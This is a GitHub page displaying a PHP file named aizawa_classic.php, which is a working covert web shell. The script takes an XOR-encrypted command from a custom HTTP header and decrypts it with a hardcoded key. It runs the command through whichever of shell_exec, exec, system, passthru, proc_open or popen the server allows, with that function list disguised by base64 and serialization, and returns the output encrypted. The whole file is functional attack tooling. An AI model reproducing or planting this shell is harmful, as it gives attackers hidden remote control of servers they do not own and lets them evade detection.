-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathaizawa_classic.php
More file actions
130 lines (110 loc) · 3.71 KB
/
aizawa_classic.php
File metadata and controls
130 lines (110 loc) · 3.71 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
<?php
header("Aizawa-Type: http_aizawa_ninja_classic");
$ENCRYPTION_KEY = "AIZAWA!!!EMA";
function get_random_bytes($length) {
if (function_exists('random_bytes')) {
return random_bytes($length);
}
if (function_exists('openssl_random_pseudo_bytes')) {
return openssl_random_pseudo_bytes($length);
}
$bytes = '';
for ($i = 0; $i < $length; $i++) {
$bytes .= chr(mt_rand(0, 255));
}
return $bytes;
}
function xor_encrypt($data, $key) {
if ($data === '' || $data === null) {
return '';
}
$iv = get_random_bytes(16);
$data_len = strlen($data);
$key_len = strlen($key);
$offset = ord($iv[0]);
$encrypted = '';
for ($i = 0; $i < $data_len; $i++) {
$k = ord($key[($i + $offset) % $key_len]);
$encrypted .= chr(ord($data[$i]) ^ $k ^ ord($iv[$i % 16]));
}
return bin2hex($iv . $encrypted);
}
function xor_decrypt($encrypted_hex, $key) {
if ($encrypted_hex === '' || $encrypted_hex === null || strlen($encrypted_hex) < 32) {
return '';
}
$data = pack('H*', $encrypted_hex);
$iv = substr($data, 0, 16);
$encrypted = substr($data, 16);
if ($encrypted === '' || $encrypted === false) {
return '';
}
$offset = ord($iv[0]);
$encrypted_len = strlen($encrypted);
$key_len = strlen($key);
$decrypted = '';
for ($i = 0; $i < $encrypted_len; $i++) {
$k = ord($key[($i + $offset) % $key_len]);
$decrypted .= chr(ord($encrypted[$i]) ^ $k ^ ord($iv[$i % 16]));
}
return $decrypted;
}
function getFunctionalCmd(string $cmd): string {
$funcs = ['shell_exec', 'exec', 'system', 'passthru', 'proc_open', 'popen'];
$obfuscated = base64_encode(serialize($funcs));
$deobfuscate = function ($x) {return unserialize(base64_decode($x));};
foreach ($deobfuscate($obfuscated) as $func) {
if (function_exists($func)) {
return obfuscatedExecution($func, $cmd);
}
}
return "No available function to execute command.";
}
function obfuscatedExecution(string $func, string $cmd): string {
$encoded = base64_encode($cmd);
$decoded = base64_decode($encoded);
switch ($func) {
case 'shell_exec':
case 'exec':
return call_user_func($func, $decoded);
case 'system':
case 'passthru':
ob_start();
call_user_func($func, $decoded);
return ob_get_clean();
case 'proc_open':
return executeWithProc_open($decoded);
case 'popen':
return executeWithPopen($decoded);
default:
return "Unknown function: $func";
}
}
function executeWithProc_open(string $cmd): string {
$spec = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]];
$proc = call_user_func('proc_open', $cmd, $spec, $pipes);
if (is_resource($proc)) {
fclose($pipes[0]);
$out = stream_get_contents($pipes[1]);
$err = stream_get_contents($pipes[2]);
array_map('fclose', array_slice($pipes, 1));
proc_close($proc);
return $err ? "Error: $err" : $out;
}
return "Failed to execute command using proc_open.";
}
function executeWithPopen(string $cmd): string {
$handle = call_user_func('popen', $cmd, 'r');
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
return $output;
}
return "Failed to execute command using popen.";
}
$encrypted_cmd = $_SERVER["HTTP_AIZAWA_NINJA"];
$cmd = xor_decrypt($encrypted_cmd, $ENCRYPTION_KEY);
ob_start();
echo getFunctionalCmd($cmd);
$output = ob_get_clean();
echo xor_encrypt($output, $ENCRYPTION_KEY);